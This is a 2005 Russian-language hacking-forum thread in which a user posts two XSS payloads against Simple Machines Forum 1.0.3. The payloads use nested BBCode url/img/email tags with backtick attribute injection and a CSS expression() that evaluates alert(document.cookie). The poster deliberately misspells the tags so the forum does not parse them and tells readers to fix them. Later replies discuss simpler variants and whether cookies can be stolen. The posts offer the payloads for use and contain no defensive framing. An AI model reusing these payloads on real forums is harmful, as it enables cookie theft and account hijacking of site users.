XSS в Simple Machines Forum (SMF) 1.0.3 (и другие)

Discussion in 'Уязвимости' started by KEZ, 2 Apr 2005.

  1. KEZ

    KEZ Guest

    Reputations:
    0
    Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

    Code:
    [urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));
    ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
    ПЕРЕПИШИТЕ САМИ!
     
    #1 KEZ, 2 Apr 2005
  2. JazzzSummerMan

    JazzzSummerMan Banned

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    наверное все можно сделать проще
     
    #2 JazzzSummerMan, 2 Apr 2005
  3. KEZ

    KEZ Guest

    Reputations:
    0
    это самое просто... просто тег+тег и s=`
     
    #3 KEZ, 3 Apr 2005
  4. KEZ

    KEZ Guest

    Reputations:
    0
    конечно с `xss=... а потом eval(this.xss) и все такое - это я так привык.
    можно и проще
     
    #4 KEZ, 3 Apr 2005
  5. c20r58p0de

    c20r58p0de New Member

    Joined:
    16 May 2005
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    #5 c20r58p0de, 4 Jun 2005
    1 person likes this.
  6. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Мог бы, но сейчас я вижу что куки там украсть нельзя... Если получится сделаю видео...
     
    #6 KEZ, 4 Jun 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.